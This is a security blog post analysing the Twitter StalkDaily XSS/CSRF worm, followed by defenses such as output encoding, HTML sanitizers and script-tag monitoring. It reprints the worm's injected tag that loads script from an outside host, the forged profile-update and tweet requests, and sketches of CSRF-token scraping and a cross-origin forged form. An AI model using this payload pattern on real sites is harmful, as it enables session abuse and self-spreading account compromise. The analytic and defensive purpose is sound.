In case you were too busy hunting for Easter eggs this past weekend, you may have missed the fact that Twitter was hit with Cross-site Request Forgery worm attacks. Many news outlets are labeling these as Cross-site Scripting attacks, which is true; however, Cross-site Request Forgery is more accurate. Let's look at these definitions:
Cross-site Scripting "occurs whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc." This definition does hold true for the Twitter worms, as the malicious payload was sent to users' browsers, where it executed.
Cross-site Request Forgery "attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks." This definition is more accurate, as the malicious JavaScript payload forces a logged-in Twitter user to update their profile to include the worm JavaScript. The fact that the JavaScript code leverages the user's session token data to send an unintentional request back to the application is the essence of a CSRF attack.
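For contrast, a classic CSRF attack does not need XSS at all; it is launched from a page on the attacker's own site and relies on the browser automatically attaching the victim's session cookie. A minimal sketch follows (the form-based delivery is illustrative only, not taken from the worm):

// Hedged sketch of a classic, cross-origin CSRF attack page hosted
// on an attacker's site. The form posts to Twitter's status-update
// endpoint (seen in the worm payload below).
var form = document.createElement("form");
form.method = "POST";
form.action = "http://twitter.com/status/update"; // cross-origin target
var status = document.createElement("input");
status.type = "hidden";
status.name = "status";
status.value = "Forged tweet"; // hypothetical spam text
form.appendChild(status);
document.body.appendChild(form);
// The browser sends the victim's Twitter session cookie with this POST,
// so the request arrives "pre-authenticated". Without a valid
// authenticity_token, though, it fails Twitter's CSRF check, which is
// exactly why this worm needed XSS to scrape the token first.
form.submit();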
In my previous post I mentioned how difficult it is to neatly place attacks into just one category. Was this an XSS attack or a CSRF attack? In actuality, it was both. These worm attacks leveraged a lack of proper output encoding to launch an XSS attack; the payload itself, however, executed a CSRF attack.
The attacks targeted the "profile" component of Twitter user accounts and injected JavaScript similar to the following:
<a href="http://www.stalkdaily.com"/><script src="hxxp://mikeyylolz.uuuq.com/x.js">
The "<script>" data is what was getting injected into people’s profiles. Taking a quick look at the "x.js" script, we see the following:
// The spam tweet text and the self-replicating payload destined for the profile URL field:
var update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! :)");
var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

// Two forged POSTs, each carrying the scraped authenticity_token:
var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token=" + authtoken + "&status=" + update + "&tab=home&update=update");
var ajaxConn1 = new XHConn(); // this declaration was dropped from the excerpt as originally quoted
ajaxConn1.connect("/account/settings", "POST", "authenticity_token=" + authtoken + "&user[url]=" + xss + "&tab=home&update=update");
The CSRF code uses AJAX calls to stealthily send the requests to Twitter without the user's knowledge. It issues a POST to the "/status/update" page to tweet the spam message, and a POST to "/account/settings" to modify the "user[url]" data. Also important to note - Twitter was using a CSRF token (called authenticity_token) to help prevent these types of attacks. This is a perfect example of why, if your web application has XSS vulnerabilities, a CSRF token is useless against local (same-origin) attacks. As you can see in the payload above, the XSS AJAX code simply scrapes the authenticity_token data from within the browser and sends it along with the attack payload.
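To make that token-scraping step concrete, here is a minimal sketch of how injected script could harvest the token and forge a request. The hidden-field lookup is an assumption based on how Rails applications typically render the authenticity_token; it is not code taken from the actual worm:

// Assumed: the CSRF token sits in a hidden input named
// "authenticity_token", as Rails apps like Twitter's rendered it.
var tokenField = document.getElementsByName("authenticity_token")[0];
var authtoken = tokenField ? tokenField.value : null;

// Because this script runs in the page's own origin, the same-origin
// policy offers no protection: the forged POST carries a valid token
// and passes the application's CSRF check.
var xhr = new XMLHttpRequest();
xhr.open("POST", "/status/update", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("authenticity_token=" + encodeURIComponent(authtoken) +
         "&status=" + encodeURIComponent("spam text here")); // hypothetical payload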
The Cortesi blog has an excellent technical write-up of what is happening -
What’s happening here is that it looks like somebody realized they could save url encoded data to the profile URL field that would not be properly escaped when re-displayed. This is particularly nasty because you could get infected simply by viewing somebody’s profile page on Twitter that was already infected. If you visited an infected profile, the JavaScript in the profile would execute and by doing so tweet the misleading link, and update your profile with the same malicious JavaScript thereby infecting anybody that then visits your profile on twitter.com.
Defenses/Mitigations - Users
Use the NoScript plugin for Firefox, as it allows you to pick and choose when, where, and what JavaScript you want to allow to run.
Defenses/Mitigations - Web Apps
Disallowing clients from submitting any HTML code is manageable; however, you still need to canonicalize the data before applying any of your filters. If done properly, you can simply look for HTML/scripting tags and data and disallow them entirely. What is challenging is when you have to allow your clients to submit HTML code but want to disallow malicious code. Wiki sites, blogs, and social media sites such as Twitter have to allow their clients some ability to upload HTML data. For situations such as this, applications such as the OWASP AntiSamy package or HTMLPurifier are excellent choices.
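When no client-supplied HTML is allowed at all, contextual output encoding is the core defense. Here is a minimal JavaScript sketch of encoding for HTML body context; this is an illustration only, and libraries such as AntiSamy or HTMLPurifier remain the better choice when some HTML must be permitted:

// Minimal sketch: encode untrusted data before rendering it into HTML.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Example: the worm's payload is rendered inert.
// escapeHtml('<script src="http://mikeyylolz.uuuq.com/x.js">')
//   returns "&lt;script src=&quot;http://mikeyylolz.uuuq.com/x.js&quot;&gt;"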
Although allowing some level of basic HTML markup is understandable, adding in scripting code is different. One aspect of monitoring that can be done (by a web application firewall) is to monitor and track the use of scripting code per resource. By tracking this type of meta-data, you could identify if *any* scripting code suddenly appears on a page (when previously there was none), or if there were, say, 2 "<script>" tags on a page and now there are 3. This would indicate some sort of application change. Once alerted to this, the next question is - was this a legitimate change or something malicious? If Twitter had been using this type of monitoring, they would have been alerted as soon as "Victim Zero" (in this case, the worm originator) altered his profile URL with the encoded JavaScript data.
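Here is a rough JavaScript sketch of that idea; the function name and baseline store are hypothetical, not taken from any particular web application firewall:

// Track the number of <script> tags served per resource and flag increases.
var scriptBaseline = {}; // resource path -> last observed <script> count

function checkScriptCount(resourcePath, responseBody) {
  var matches = responseBody.match(/<script\b/gi);
  var count = matches ? matches.length : 0;
  var previous = scriptBaseline[resourcePath];
  if (previous !== undefined && count > previous) {
    // e.g. a profile page that had 2 script tags now has 3: alert an
    // analyst to ask "legitimate change or something malicious?"
    console.warn("Script count on " + resourcePath +
                 " rose from " + previous + " to " + count);
  }
  scriptBaseline[resourcePath] = count;
}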